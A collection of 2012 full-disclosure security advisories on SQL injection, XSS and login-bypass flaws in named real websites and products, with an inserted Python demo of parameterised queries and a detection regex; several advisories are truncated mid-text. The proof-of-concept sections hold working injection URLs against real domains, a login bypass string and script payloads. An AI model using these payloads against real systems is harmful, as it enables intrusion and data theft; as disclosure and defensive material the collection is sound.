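Escaping is context-specific: html.escape is correct for text and quoted attribute values, the URL part of an href additionally needs percent-encoding, and a value placed inside inline JavaScript would need a JavaScript-string encoder instead. The allowlist removes the question for parameters that never need free text.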
[Full-disclosure] Verkehrsbetriebe Berlin - SQL Injection Vulnerability
Title:
Verkehrsbetriebe Berlin - SQL Injection Vulnerability

Date:
2012-01-25

References:
http://www.vulnerability-lab.com/get_content.php?id=138

VL-ID:
138

Introduction:
VBB Verkehrsverbund Berlin-Brandenburg GmbH: The VBB coordinates the interests of the various partners and shapes the development of a high-performance, integrated local public transport system in Berlin.

(Copy of the Vendor's Homepage: http://www.vbbonline.de/ )

Abstract:
An anonymous researcher discovered a critical SQL injection vulnerability on the website of Berlin's VBB Verkehrsbetriebe.

Report-Timeline:
2011-02-09: Vendor Notification 1
2011-03-06: Vendor Notification 2
2011-04-13: Vendor Notification 3
2012-01-25: Vendor Response/Feedback
2012-01-25: Vendor Fix/Patch
2012-01-25: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Critical

Details:
A critical SQL injection vulnerability is detected on the VBB Verkehrsverbund Berlin-Brandenburg GmbH website. The vulnerability allows remote attackers to inject their own SQL statements into the affected application/DBMS. Successful exploitation can result in website defacement, data loss, manipulation of content and module destruction.

Vulnerable Modules:
[+] Language ID

Pictures:
../sql1.png
../sql2.png

Proof of Concept:
The vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduce ...

File: index.php
Para: ?cat=2&sCat=392&id_language=

References:
http://www.vbbonline.de/index.php?cat=2sCat=392id_language=-1 union select 1,2,3,4,5,version()/*
http://www.vbbonline.de/index.php?cat=2sCat=392id_language=-1%20union%20select%201,2,3,4,5,database%28%29/*

Reference(s):
http://www.vbbonline.de/intern/static/index.php

Risk:
The security risk of the SQL injection vulnerability is estimated as critical.

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri & Pim J.F.P. Campers
[Full-disclosure] Acolyte CMS v1.5 and v6.3 - SQL Injection Vulnerabilities
Title:
Acolyte CMS v1.5 and v6.3 - SQL Injection Vulnerabilities

Date:
2012-01-25

References:
http://www.vulnerability-lab.com/get_content.php?id=397

VL-ID:
397

Abstract:
A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection and a persistent XSS on the Acolyte CMS v1.5.3 and v1.6.3.

Report-Timeline:
2012-01-25: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
1.1
A SQL Injection vulnerability is detected in the Acolyte v1.5 and v6.3 CMS. The vulnerability allows a remote attacker to execute SQL commands via a remote SQL injection attack. The bug is located in the news_comments and plugin_forum modules of the content management system. Successful exploitation of the vulnerability allows a remote attacker to compromise the application's DBMS.

Vulnerable Module(s): (v1.5.3)
[+] ?c=pluginplugin=forums
[+] ?c=news_comments

Vulnerable Module(s): (v1.6.3)
[+] ?c=news_comments
[+] ?c=forum_post

1.2
A persistent input validation vulnerability is detected in the Acolyte v1.5 and v6.3 CMS. The vulnerability allows a remote attacker to hijack customer sessions via an application-side attack. Successful exploitation, which requires user interaction, allows an attacker to manipulate the web context of requests to the vulnerable application module.

Vulnerable Module(s): (v1.6.3 & v1.5.3)
[+] ?c=pluginplugin=forums

Proof of Concept:
The vulnerabilities can be exploited by a remote attacker. For demonstration or to reproduce ...

1.1
v1.5.3
?c=pluginplugin=forums2=topicss=[vuln]
?c=pluginplugin=forums2=posts=3t=[vuln]
?c=news_commentscid=[vuln]

v1.6.3
?c=forum_posts=3t=[vuln]
?c=forum_posts=[vuln]
?c=news_commentscid=[vuln]

1.2
?c=pluginplugin=forums2=search
scriptalert(vulnerability-lab)/script

Risk:
1.1
The security risk of the SQL injection vulnerabilities is estimated as high(+).

1.2
The security risk of the persistent input validation vulnerability is estimated as medium(+).

Credits:
Vulnerability Laboratory Researcher - snup (snup@gmail.com)
[Full-disclosure] SpamTitan Application v5.08x - SQL Injection Vulnerability
Title:
SpamTitan Application v5.08x - SQL Injection Vulnerability

Date:
2012-01-23

References:
http://www.vulnerability-lab.com/get_content.php?id=197

VL-ID:
197

Introduction:
SpamTitan Anti Spam is a complete software solution to email security offering protection from Spam, Viruses, Trojans, Phishing and unwanted content.

Feature Set
* Two Anti Virus engines including ClamAV and Kaspersky Labs
* Multi layered Anti Spam analyses resulting in 98% plus Spam detection
* Less than 0.03% False Positive Rate
* Content Filtering
* Inward and outward email scanning
* Email Disclaimer capability
* Simple download and installation process
* Plug and Play Solution
* End user Spam management using email quarantine reports
* Web based administrative GUI
* Multiple automated reports
* Automated updating including anti virus, anti spam, version releases and system backup
* LDAP, Dynamic and aliases file recipient verification
* Per domain administrators
* Per domain reports
* API
* Multi node Cluster

SpamTitan is available in two flavours, SpamTitan ISO and SpamTitan for VMware®, both of which can be downloaded and installed for free.

(Copy of the Vendor Homepage: http://www.spamtitan.com/products)

Abstract:
The Vulnerability Lab Team discovered a remote SQL Injection vulnerability on the SpamTitan Appliance (Application) v5.08.x.

Report-Timeline:
2011-09-17: Vendor Notification
2011-11-20: Vendor Response/Feedback
2011-01-14: Vendor Fix/Patch
2011-01-23: Public or Non-Public Disclosure

Status:
Published

Affected Products:
Copperfasten Technologies
Product: SpamTitan Appliance Application v5.0x

Exploitation-Technique:
Remote

Severity:
Critical

Details:
A remote SQL injection vulnerability is detected on the new SpamTitan Application v5.08.x. The vulnerability allows a remote attacker to inject and execute their own SQL statements blind. The attack method is ORDER BY injection.

--- Error Logs ---
MDB2 Error: unknown error

Vulnerable Module(s):
[+] Session QID+RID

Picture(s):
../sql1.png

Proof of Concept:
The vulnerability can be exploited by remote attackers. For demonstration or to reproduce ...

Path: ../
File: viewmail.php
Param(s): ?activepage=detailsqid=w3jYVc7V3LFFrid=

Section(SQL):
http://[Server]:[Port]/[File]+[Param]+[Session][QID]=87' order by 15--

Reference(s):
http://xxx.com:8080/viewmail.php?activepage=detailsqid=w3jYVc7V3LFFrid=87%27%20order%20by%2015--

Risk:
The security risk of the SQL injection vulnerability is estimated as critical.

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri, Pim J.F. Campers
[Full-disclosure] Zone Rouge CMS 2012 - SQL Injection Vulnerability
Title:
Zone Rouge CMS 2012 - SQL Injection Vulnerability

Date:
2012-01-21

References:
http://www.vulnerability-lab.com/get_content.php?id=391

VL-ID:
391

Introduction:
Professional CMS with many amenities, popular in its country.

(Copy of the Vendor Homepage: http://zonerouge.fr)

Abstract:
A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection vulnerability in sites powered by Zone Rouge CMS.

Report-Timeline:
2012-01-21: Public or Non-Public Disclosure

Status:
Published

Affected Products:

Exploitation-Technique:
Remote

Severity:
High

Details:
A remote SQL Injection vulnerability has been discovered in the Zone Rouge CMS application. The vulnerability allows an attacker to execute their own SQL commands via injection. The bug is located in the files driver.php, photos.php and release.php. Successful exploitation can result in compromise of the CMS DBMS via remote SQL injection.

Vulnerable File(s):
[+] driver.php
[+] photos.php
[+] release.php

Proof of Concept:
The vulnerabilities can be exploited by remote attackers without user interaction. For demonstration or to reproduce ...

PoC:
[+] driver.php?langue=frchamp=`[SQL-Injection]
[+] photos.php?langue=frarchives=`[SQL-Injection]
[+] release.php?langue=frchamp=`[SQL-Injection]

Reference(s):
[+] http://[SERVER].COM/[FILE].PHP?langue=frarchives=`%60

Risk:
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
Vulnerability Laboratory Researcher - snup (snup@gmail.com)

Gr33tz:
agilob, cOnd, czoik, drummachina, gocys, prick
im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom
antonius, Rem0ve, longrifle0x
[Full-disclosure] Joomla com_mobile Component - SQL Injection Vulnerability
Title:
Joomla com_mobile Component - SQL Injection Vulnerability

Date:
2012-01-21

References:
http://www.vulnerability-lab.com/get_content.php?id=393

VL-ID:
393

Introduction:
com_mobile Joomla CMS Component

Abstract:
A Vulnerability Laboratory researcher discovered multiple SQL Injection vulnerabilities in the Joomla com_mobile component.

Report-Timeline:
2012-01-22: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
Multiple SQL Injection vulnerabilities are detected in the Joomla com_mobile component. The vulnerabilities allow remote attackers to inject their own SQL commands into the affected application's DBMS. Successful exploitation can result in compromise of the DBMS and the website application.

Vulnerable Module(s):
[+] ?option=com_mobileview=mobilelayout=songsdownloadid=
[+] ?option=com_mobileformat=rawtask=rezomeidshop=

Proof of Concept:
The vulnerabilities can be exploited by remote attackers without user interaction. For demonstration or to reproduce ...

PoC:
http://localhost/index.php?option=com_mobileview=mobilelayout=songsdownloadid=[SQL-INJECTION!]
http://localhost/index.php?option=com_mobileformat=rawtask=rezomeidshop=[SQL-INJECTION!]

Reference(s):
http://xxx.com/index.php?option=com_mobileview=mobilelayout=songsdownloadid=102' [SQL-INJECTION!]
http://xxx.com/index.php?option=com_mobileformat=rawtask=rezomeidshop=160'[SQL-INJECTION!]

Risk:
The security risk of the remote SQL injection vulnerabilities is estimated as high(+).

Credits:
the_cyber_nuxbie [www.thecybernuxbie.com] (st...@thecybernuxbie.com)
[Full-disclosure] Parallels H Sphere v3.3 P1 - Multiple Persistent Vulnerabilities
Title:
Parallels H Sphere v3.3 P1 - Multiple Persistent Vulnerabilities

Date:
2012-01-22

References:
http://www.vulnerability-lab.com/get_content.php?id=392

VL-ID:
392

Introduction:
Parallels H-Sphere delivers a multi-server hosting automation solution for Linux, BSD, and Windows platforms. H-Sphere includes its own control panels, automated billing, and provisioning solution in a single integrated system. It is scalable to any number of boxes: more Web, mail, database, and Windows hosting servers can be added without downtime.

Abstract:
A Vulnerability Laboratory researcher discovered multiple persistent cross site scripting vulnerabilities in Parallels H-Sphere 3.3 Patch 1.

Report-Timeline:
2012-01-22: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple persistent cross site scripting vulnerabilities were detected in Parallels H-Sphere 3.3 Patch 1. These vulnerabilities allow a remote attacker to hijack customer sessions via persistent cross site scripting. Successful exploitation can result in account theft, client-side exploitation, or phishing and session hijacking. These bugs are located in the admin panel of Parallels H-Sphere 3.3 Patch 1.

Vulnerable Module(s):
[+] Group Module
[+] Extra Package Module

Picture(s):
../1.png
../2.png

Proof of Concept:
The vulnerability can be exploited by remote attackers with high account privileges (mod/admin) and required user interaction. For demonstration or to reproduce ...

[PoC 1]
Open link: http://demo.psoft.net/psoft/servlet/psoft.hsphere.CP/admin/1_0/psoft.hsphere.CP?template_name=admin/group_plans.html
Choose admin and post the XSS payload in "Group Name":
IFRAME SRC=javascript:alert('XSS');/IFRAME
Press "add group". Result: XSS!

[PoC 2]
Open link: http://demo.psoft.net/psoft/servlet/psoft.hsphere.CP/admin/1_0/psoft.hsphere.CP?template_name=admin/extra_packs/create_extra_pack.html
In "Extra Pack Name" put the XSS code:
IFRAME SRC=javascript:alert('XSS');/IFRAME
Under "Extra Package Prices" set fee 1 and recurrent fee 1, then click submit; you will see the result.

Risk:
The security risk of the persistent cross site scripting vulnerabilities is estimated as medium(-).

Credits:
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)
[Full-disclosure] Bart`s CMS - SQL Injection Vulnerability
Title:
Bart`s CMS - SQL Injection Vulnerability

Date:
2012-01-23

References:
http://www.vulnerability-lab.com/get_content.php?id=390

VL-ID:
390

Introduction:
It is a website Content Management System that is built with Codecharge Studio. There will also be a commercial package, which contains all source code AND the Codecharge Studio project files. More information on Codecharge Studio can be found on the website of Yessoftware.

Currently the CMS includes the following modules:
Default / CMS
Users
Website pages
Blocks
Banners
Links
Image gallery
Store / Webshop
Diagrams
Download manager
IP To Country
Mailing
Polls
Calendar / Events
Blog / News
Guestbook
JW Flash Image Rotator

(Copy of the Vendor Website: http://www.yessoftware.com/index2.php)
(Copy: http://trinityhome.org/Home/index.php?content=BART_S_CMS_WHAT_IS_ITfront_id=21lang=enlocale=en)

Abstract:
A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection vulnerability in Bart`s CMS.

Report-Timeline:
2012-01-23: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
A remote SQL Injection vulnerability has been discovered in the Bart`s CMS application. The vulnerability allows an attacker to execute their own SQL commands via injection. The bug is located in the files blog.php and blog_comments.php. Successful exploitation can result in compromise of the CMS DBMS via remote SQL injection.

Vulnerable Module(s):
[+] blog.php
[+] blog_comments.php

Proof of Concept:
The vulnerability can be exploited by a remote attacker without user interaction. For demonstration or to reproduce ...

PoC:
[SERVER].COM/[BART CMS PATH]/blog_comments.php?blog_id=`[SQL-Injection]

Risk:
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
Vulnerability Laboratory Researcher - snup (snup@gmail.com)

Gr33tz:
agilob, cOnd, czoik, drummachina, gocys, prick
im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom
antonius, Rem0ve, longrifle0x
[Full-disclosure] VolksBank ZU Application - Auth Bypass Vulnerability
Title:
VolksBank ZU Application - Auth Bypass Vulnerability

Date:
2012-01-20

References:
http://www.vulnerability-lab.com/get_content.php?id=382

VL-ID:
382

Introduction:
Volksbank AG takes a number of security precautions that offer effective protection against attacks during the transmission of data or its processing on the bank's server. Please also take precautions to protect yourself against unauthorised manipulation or interference by third parties, and report suspicious e-mails to us. On the following page, enter any number as the user number (Verfügernummer) and then click LOGIN to start the demo version.

(Copy of the Vendor Homepage: https://www.banking.co.at/appl/ebp/login.html?resource=074demo=true)

Abstract:
An anonymous Vulnerability Lab researcher discovered an Auth Bypass vulnerability in a well-known Volksbank portal application.

Report-Timeline:
2011-02-07: Vendor Notification
2011-00-00: Vendor Response/Feedback
2011-00-00: Vendor Fix/Patch
2012-01-20: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Critical

Details:
An auth bypass vulnerability is detected in the login system of the Zinsuniversum portal on the Volksbank website. The vulnerability allows a remote attacker to bypass the login form without authorization via "or 1=1". Successful exploitation can result in compromise of the application DBMS and theft of accounts/passwords.

Vulnerable Module(s):
[+] Login - Form

--- Information Logs ---
Legal notice
By accessing the information on this website you declare that you have understood and expressly accept the legal conditions associated with this site.

No offer, information only
The data and statements published on this website serve exclusively as non-binding information. None of the information contained herein constitutes a recommendation to buy or sell securities or investments. The information does not replace advice on the products described on this website and in particular does not serve as a substitute for comprehensive risk disclosure. Where valuations or prices are quoted for products on this website, these are generally indicative valuation prices. It cannot be inferred from the indicative valuation prices that products can be bought or sold at them. Statements about the past performance of a product do not allow reliable conclusions about its future performance.

No liability
Despite all due care, any liability or guarantee for the timeliness, correctness and completeness of the information, data and statements made available on this website is excluded. ÖVAG accepts no responsibility and gives no guarantee that the functions on this website will not be interrupted or will be free of errors.

No disclosure
Passing on the information provided to third parties is prohibited.

Proof of Concept:
The vulnerability can be exploited by remote attackers. For demonstration or to reproduce ...

String: 'or 1=1--...
Insert as Username and Password

Reference(s):
http://www.volksbank.com/m101/volksbank/m074_4/de/individuelle_seite/zinsuniversum/zinsuni_login.jsp

Solution:
Example ...

// Escape the user-supplied values before they are placed into the query
// (the fix proposed by the advisory). Note that the mysql_* extension is
// deprecated since PHP 5.5; prepared statements via PDO or mysqli bind the
// values as data and are the preferred approach.
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$sql = "SELECT * FROM users WHERE username='" . $username . "' AND password='" . $password . "'";
$response = mysql_query($sql);

Risk:
The security risk of the login bypass web vulnerability is estimated as critical.

Credits:
Vulnerability Research Laboratory - N/A (Anonymous)
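The login bypass and the escaping fix above, reproduced as an added example that is not part of the advisory: a login check that concatenates the submitted fields into the query (the pattern the string 'or 1=1-- defeats) beside the same check using bound parameters, plus a heuristic that flags such input in submitted login fields for log review. The user table, user name, password and SQLite backend are constructed sample data, not anything from the Volksbank application.

```python
import re
import sqlite3

# Constructed sample data (not from the advisory): one user row loaded into an
# in-memory SQLite database so the example runs offline.
SAMPLE_USERS = [("alice", "s3cret-sample")]

# The string the advisory reports as inserted into both login fields.
BYPASS_INPUT = "' or 1=1--"


def make_db() -> sqlite3.Connection:
    """Create the in-memory users table and load the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def login_concatenated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable check: the submitted fields are glued into the SQL text.

    A single quote in the input closes the string literal, so the rest of the
    input is parsed as SQL.  With BYPASS_INPUT the statement becomes
        SELECT id FROM users WHERE username='' or 1=1--' AND password='...'
    where everything after '--' is a comment and 'or 1=1' matches every row.
    """
    sql = (
        "SELECT id FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened check: placeholders bind the input as data, never as SQL text."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Heuristic for log review: a quote followed by OR and an X=Y comparison,
# as in ' or 1=1-- or ' or 'a'='a.  It is a detection aid for submitted login
# fields, not a substitute for parameterised queries.
_TAUTOLOGY = re.compile(
    r"'\s*or\s+(\w+|'[^']*'?)\s*=\s*(\w+|'[^']*'?)", re.IGNORECASE
)


def looks_like_tautology_injection(value: str) -> bool:
    """Return True when a submitted field carries a quote-OR-tautology pattern."""
    return bool(_TAUTOLOGY.search(value))


def run_demo() -> dict:
    """Run both checks with valid credentials and with the bypass string."""
    conn = make_db()
    try:
        return {
            "valid_concatenated": login_concatenated(conn, "alice", "s3cret-sample"),
            "bypass_concatenated": login_concatenated(conn, BYPASS_INPUT, BYPASS_INPUT),
            "valid_parameterised": login_parameterised(conn, "alice", "s3cret-sample"),
            "bypass_parameterised": login_parameterised(conn, BYPASS_INPUT, BYPASS_INPUT),
            "bypass_flagged": looks_like_tautology_injection(BYPASS_INPUT),
            "name_flagged": looks_like_tautology_injection("O'Brien"),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The concatenated check accepts the bypass string as a valid login; the parameterised check rejects it while still accepting the real credentials, and a legitimate name containing an apostrophe is not flagged by the heuristic.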
[Full-disclosure] Syneto UTM WAF v1.4.2 - Multiple Web Vulnerabilities
Title:
Syneto UTM WAF v1.4.2 - Multiple Web Vulnerabilities

Date:
2012-01-20

References:
http://www.vulnerability-lab.com/get_content.php?id=373

VL-ID:
373

Introduction:
The Syneto UTM (Unified Threat Management) is a security appliance that performs multiple functions and delivers maximum protection against internet threats. It's a single device that has it all: firewall, gateway antivirus and anti-spam, VPN, content filter, multiple gateways and on-appliance reporting. Syneto UTM was specifically designed to be easily deployed and managed, supply top protection and save you money.

(Copy of the Vendor Homepage: http://syneto.net/en/network-security/utm)

Abstract:
A Vulnerability-Lab researcher discovered multiple web vulnerabilities in Syneto's Security UTM Application v1.4.x and v1.3.3 CE.

Report-Timeline:
2011-10-07: Vendor Notification
2012-**-**: Vendor Response/Feedback
2012-**-**: Vendor Fix/Patch
2012-01-20: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
1.1
Multiple persistent web vulnerabilities are detected in the Syneto Unified Threat Management Security Appliance Application. The vulnerability allows a privileged user account to inject malicious persistent script code on the application side (server). Successful exploitation of the vulnerability can result in account theft, persistent session hijacking via script code injection, persistent external redirects, persistent context manipulation of requests and persistent phishing.

Vulnerable Module(s):
[+] Reports - Executive Summary - Name Input Fields & Output Listing Category
[+] EMail - Filter Add or Configure Edit
[+] EMail - Add Blacklist Rule & Add Whitelist Rule
[+] EMail Settings - New Domain

Picture(s):
../1.png
../2.png

1.2
Multiple non-persistent cross site scripting vulnerabilities are detected in the Syneto Unified Threat Management Security Appliance Application. The vulnerability allows a remote attacker to hijack customer/admin sessions via client-side cross site scripting requests. Successful exploitation requires user interaction and results in account theft via session hijacking.

Vulnerable Module(s):
[+] Index - Exception Handling via Errors
[+] Index - Info Requests

Affected Version(s):
[+] Syneto's Security UTM Application v1.4.x & v1.3.3 Community Edition

Proof of Concept:
The vulnerabilities can be exploited by privileged user accounts, low-privilege viewers or remote attackers with required user interaction. For demonstration or to reproduce ...

1.1.1
[+] Reports - Executive Summary - Output Listing Category

<tr id="list_1" class="tableRowEven">
<td class="status" valign="top" align="center">
<a href="#" title="Disable the reporting list" class="disableList"><img src="img/enabled.gif" title="disable" alt="disable" class="disable"></a>
<a style="display: none;" href="#" title="Enable the reporting list" class="enableList"><img src="img/disabled.gif" title="enable" alt="enable" class="enable"></a>
</td>
<td valign="top">EXECUTION OF PERSISTENT SCRIPT CODE!'</td>
<td valign="top" nowrap="nowrap">
<a href="#" id="list_1" class="editList"><img src="img/edit.gif" title="Edit" alt="Edit" /></a>
<a href="syneto.php?menuid=307&action=delete&id=1" class="deleteList"><img src="img/delete.gif" title="Delete" alt="Delete" /></a>
</td>
</tr>
</tbody>
</table>
</div>

Reference(s):
https://[SYNETO UTM SERVER].com/syneto.php?menuid=307

1.1.2
[+] EMail - Filter Add & Configure

<div>Sender = EXECUTION OF PERSISTENT SCRIPT CODE!.*</div>
<div>Receiver = .*</div>
<div>Subject = .*(SPAM|VIAGRA).*</div>

Reference(s):
https://[SYNETO UTM SERVER].com/syneto.php?menuid=63

1.1.3
[+] EMail Settings - New Domain

<table class="data" id="smtpDomainsList">
<thead>
<tr>
<th class="status">Status</th>
<th class="domain">Domain</th>
<th class="routing">Routing</th>
<th class="verify_sender">Verify sender</th>
<th class="qdm">Send digest</th>
<th class="actions">Actions</th>
</tr>
</thead>
<tbody>
<tr id="domain_3" class="tableRowEven editableDomain">EXECUTION OF PERSISTENT SCRIPt CODE!<td class="status">
<input name="active" value="1" type="hidden">
<input name="qdm_enabled" value="" type="hidden">
<input name="qdm_hours" value="23" type="hidden">
<input name="admin_email" value="scriptEXECUTION
[Full-disclosure] RheinMetall AG - Multiple SQL Injection Vulnerabilities
Title:
RheinMetall AG - Multiple SQL Injection Vulnerabilities

Date:
2012-01-17

References:
http://www.vulnerability-lab.com/get_content.php?id=170

VL-ID:
170

Introduction:
- UK
Rheinmetall AG is a German automotive and defence company with factories in Düsseldorf, Kassel and Unterlüß. The company has a long tradition of making guns and artillery pieces. The company is also involved in a variety of advanced metal-working and milling technologies, allowing it to provide special high-quality components for small arms in addition to heavy weapon production.
* A traditional company with 20,000 employees worldwide
* Market leader in its core competencies
* EUR 3.4 billion annual sales (2009)

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Rheinmetall)

- DE
Rheinmetall was founded in 1889 as Rheinische Metallwaaren- und Maschinenfabrik Actiengesellschaft. Today Rheinmetall AG stands for a financially strong, internationally successful company in the automotive supply and defence technology markets. In the Automotive sector, the lead company Kolbenschmidt Pierburg AG, with its business units KS Kolbenschmidt, Pierburg, KS Aluminium-Technologie, Pierburg Pump Technology, KS Gleitlager and Motor Service, specialises in modules and systems around the engine. For the current and future requirements of manufacturers, innovative solutions in the areas of emission reduction, fuel consumption reduction, lightweight construction and performance optimisation are developed and marketed. The Defence division of the Rheinmetall Group, with its business units Vehicle Systems, Weapons and Munitions, Propulsion Systems, Air Defence, Defence Electronics, and Simulation and Training, is one of the well-known major names in the international defence and security industry.
* Traditional company with 20,000 employees worldwide
* Market leader in its core competencies
* EUR 3.4 billion annual sales (2009)

(Copy of the Vendor Homepage: http://www.rheinmetall.de/)

Abstract:
An anonymous researcher of the Vulnerability-Lab Team discovered multiple critical SQL Injection vulnerabilities on the websites of the well-known vendor Rheinmetall AG and of KSPG Defense.

Report-Timeline:
2011-01-09: Vendor Notification
2011-02-25: Vendor Notification 2
2011-03-16: Vendor Notification 3
2011-**-**: Vendor Response/Feedback
2011-01-06: Vendor Fix/Patch by VLAB Check
2012-01-17: Public or Non-Public Disclosure

Status:
Published

Affected Products:

Exploitation-Technique:
Remote

Severity:
Critical

Details:
Multiple SQL injection vulnerabilities are detected on the official website of Rheinmetall Defence. Remote attackers can execute their own SQL commands via injection to compromise the web server or the affected DBMS. Successful exploitation can result in theft of sensitive information by dumping all application web databases of the main and KSPG Defense websites.

Vulnerable Module(s):
[+] contact.php
[+] index.php
[+] jobinfo.php
[+] index.php
[+] print.php

Vulnerable Parameter(s):
[+] ?lang=
[+] ?id=
[+] ?gid=
[+] ?jid=
[+] ?fid=

Affected Domains:
[+] rheinmetall.com
[+] hrp.rheinmetall.com
[+] rheinmetall-defence.com
[+] KSPG AG all Offices Websites (http://www.kspg-ag.de/index.php?fid=119lang=de)

--- Exception Logs ---
You have an error in your SQL syntax near -* at line 1
You have an error in your SQL syntax near -*-at line 1
--
You have an error in your SQL syntax nearand cms_release=1 and cms_trash=0 and cms_syscat=0 order by cms_order -*at line 1
--
You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0-*at line 1
You have an error in your SQL syntax near -* and cms_release = 1 and cms_trash = 0 and cms_syscat = 0 -* at line 1
[Full-disclosure] Airport Koeln/Bonn - Blind SQL Injection Vulnerabilities
Title:
======
Airport Koeln/Bonn - Blind SQL Injection Vulnerabilities

Date:
=====
2012-01-20

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=174

VL-ID:
=====
174

Introduction:
=============
(translated from the German vendor text)
Cologne Bonn Airport (Köln/Bonn) is one of Germany's largest commercial airports. Every year more than 10 million passengers choose the "airport of short distances", which puts it in sixth place nationwide. With around 590,000 tonnes of air freight handled per year, Köln/Bonn ranks second behind Frankfurt. Taking passenger volume and cargo handling together, the airport ranks fourth. When the low-cost carriers Germanwings and TUIfly made the former government airport "Konrad Adenauer" their home base in 2002, Köln/Bonn developed rapidly. Passenger numbers doubled within five years, and the number of destinations passed the 130 mark. Geographically, the airport lies in one of the most densely populated regions of Europe; around 15.5 million people live within a radius of 100 kilometres. The excellent transport infrastructure and the 24-hour operating licence underpin the growth potential the airport has with its three runways. The two terminals have 86 check-in desks. Passengers reach the aircraft via 55 gates and 19 jet bridges. The new passenger screening point in Terminal 1 was expanded from 10 to 18 lanes at the end of last year. Köln/Bonn is easily reached via motorways and expressways. Since 2004 the underground airport railway station has connected Terminals 1 and 2. 170 trains stop there every day, including Intercity, regional and S-Bahn services. Three multi-storey car parks together provide 11,200 parking spaces.

(Copy of the Vendor Homepage: http://www.airport-cgn.de/main.php?id=49&lang=1)

Abstract:
=========
An anonymous Vulnerability Laboratory researcher discovered multiple critical SQL Injection vulnerabilities on the official Cologne/Bonn Airport vendor website.

Report-Timeline:
================
2011-03-02: Vendor Notification
2011-**-**: Vendor Response/Feedback
2012-01-03: Vendor Fix/Patch
2012-01-20: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
Multiple blind SQL injection vulnerabilities are detected on the Köln/Bonn Airport website. The vulnerabilities allow remote attackers to inject their own SQL commands into the affected application's DBMS. Successful exploitation can result in compromise of the DBMS and of the website application.

Vulnerable Module(s):
[+] Index Main

Picture(s):
../sql1.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers without user interaction. For demonstration or reproduction ...

Vulnerable Files: index.php ; main.php
Vulnerable Parameters: ?langID= ; id=4&sm= ; ?id=174&kat=

Blind SQL Injection - Reference(s):
http://www.airport-cgn.de/barrierefrei/index.php?langID=1+AND+IF%28SUBSTRING%28VERSION%28%29,1,1%29=5,1,2%29=1&id=5&sm=-1%27
http://www.airport-cgn.de/barrierefrei/index.php?langID=1&id=4&sm=11%20order%20by%201--
http://www.koeln-bonn-airport.de/main.php?id=174&kat=1 and 1=2--

SQL Injection - Reference(s):
http://www.airport-cgn.de/barrierefrei/index.php?langID=1&id=-1%20union%20all%20select%201,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29--
http://www.koeln-bonn-airport.de/main.php?id=174&kat=-1%20union%20all%20select%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,7--

Solution:
=========
2012-01-03: Vendor Fix/Patch

Risk:
=====
The security risk of the blind SQL injection vulnerabilities is estimated as critical.

Credits:
========
Vulnerability Research Laboratory - N/A Anonymous

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have
[Full-disclosure] Barracuda Spam/Virus WAF 600 - Multiple Web Vulnerabilities
Title:
======
Barracuda Spam/Virus WAF 600 - Multiple Web Vulnerabilities

Date:
=====
2012-01-19

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=28

VL-ID:
=====
28

Introduction:
=============
Barracuda Networks - Worldwide leader in email and Web security. The Barracuda Spam & Virus Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy-to-use and affordable solution to eliminating spam and viruses from your organization by providing the following protection:

Barracuda Spam & Virus Firewall
* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service

